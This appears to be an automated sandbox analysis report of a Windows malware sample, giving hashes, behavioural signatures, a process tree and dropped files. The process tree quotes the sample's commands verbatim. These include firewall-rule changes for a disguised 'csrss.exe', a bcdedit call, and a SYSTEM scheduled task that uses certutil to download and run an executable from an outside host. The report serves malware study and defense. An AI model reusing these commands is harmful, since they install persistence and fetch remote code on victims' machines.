Analysis
-
max time kernel
4s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 13:57
Static task
static1
Behavioral task
behavioral1
Sample
dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
Resource
win10v2004-20220414-en
General
-
Target
dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
-
Size
3.8MB
-
MD5
cf300ac61d822819800e96198b91b1c9
-
SHA1
9daa6f31bbc1d329bfb4180e33f8c97402868a5b
-
SHA256
dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d
-
SHA512
86837965dce13c2f8da00b19806e18fde09b18913feb9ab3866c8cffb8c5cb6613a79e8c8d514e1a5a18541cc2121c60e7c3efa88ab7c20112e68ddc47d3fdc3
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 4044 bcdedit.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2924 2764 WerFault.exe dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe 5048 2116 WerFault.exe dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes
-
C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 6923⤵
- Program crash
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 8562⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2764 -ip 27641⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2116 -ip 21161⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
233KB
MD5f4e16aeaafd025b19e1cc7953d99eea4
SHA1dbd9595469aa99b55656030088348f22f0eb8ebe
SHA2563a0040b7daa8b1834fd7b6026c64eaa5d213df422752c28ea10fd027dc4839da
SHA512e785cc3cf3d552104eb59b1f900f178c1ce34c41ccb5530a8b93c9dbd7703f1d646913deefa5b5b3ecd0088b129969b15c914ef2132874b7f3809de84a2ccf60
-
C:\Windows\rss\csrss.exeFilesize
282KB
MD56ec88097f2630e5082b02859812e386d
SHA16f13e04f8c2d1d7fbde949ba6c309ed438ed8a72
SHA256fac8ea804a36d647ac09ab94e21bb19a05b2cebd78917116c508da7973499613
SHA512396038a28c3a204b6891c0b95b8b47cf3559756d41fa9b003cab9e5c139197b2f14fe00803a8a75846cf601029788cbae4200fab0a6596d0232bf770af5b0f88
-
C:\Windows\rss\csrss.exeFilesize
181KB
MD524a9dad4c62947204e900fb1d6425c8a
SHA1acec4d3b171339e1916aa173005618525c632489
SHA256b733206522b752b94ab477776634207676ee7ccf065e4fec0fa172cdf693b30a
SHA5129ef1b1d493a1eba98352ba837ca4ee394463a7e6fe5bf54a7e32853384eebd590e0bfc62f982c39451f8f7912963d84d8b842ad6a3ba53be96a3c13cebca9d6b
-
memory/868-144-0x0000000000000000-mapping.dmp
-
memory/1712-143-0x0000000000000000-mapping.dmp
-
memory/2056-140-0x0000000000000000-mapping.dmp
-
memory/2056-149-0x0000000000400000-0x000000000281E000-memory.dmpFilesize
36.1MB
-
memory/2056-145-0x0000000004A00000-0x0000000004DA6000-memory.dmpFilesize
3.6MB
-
memory/2116-137-0x0000000000400000-0x000000000281E000-memory.dmpFilesize
36.1MB
-
memory/2116-133-0x0000000000000000-mapping.dmp
-
memory/2116-136-0x000000000450D000-0x00000000048B3000-memory.dmpFilesize
3.6MB
-
memory/2184-139-0x0000000000000000-mapping.dmp
-
memory/2764-130-0x0000000004635000-0x00000000049DB000-memory.dmpFilesize
3.6MB
-
memory/2764-132-0x0000000000400000-0x000000000281E000-memory.dmpFilesize
36.1MB
-
memory/2764-131-0x00000000049E0000-0x00000000050D5000-memory.dmpFilesize
7.0MB
-
memory/3672-134-0x0000000000000000-mapping.dmp
-
memory/4044-148-0x0000000000000000-mapping.dmp
-
memory/4528-138-0x0000000000000000-mapping.dmp
-
memory/4536-146-0x0000000000000000-mapping.dmp
-
memory/4588-135-0x0000000000000000-mapping.dmp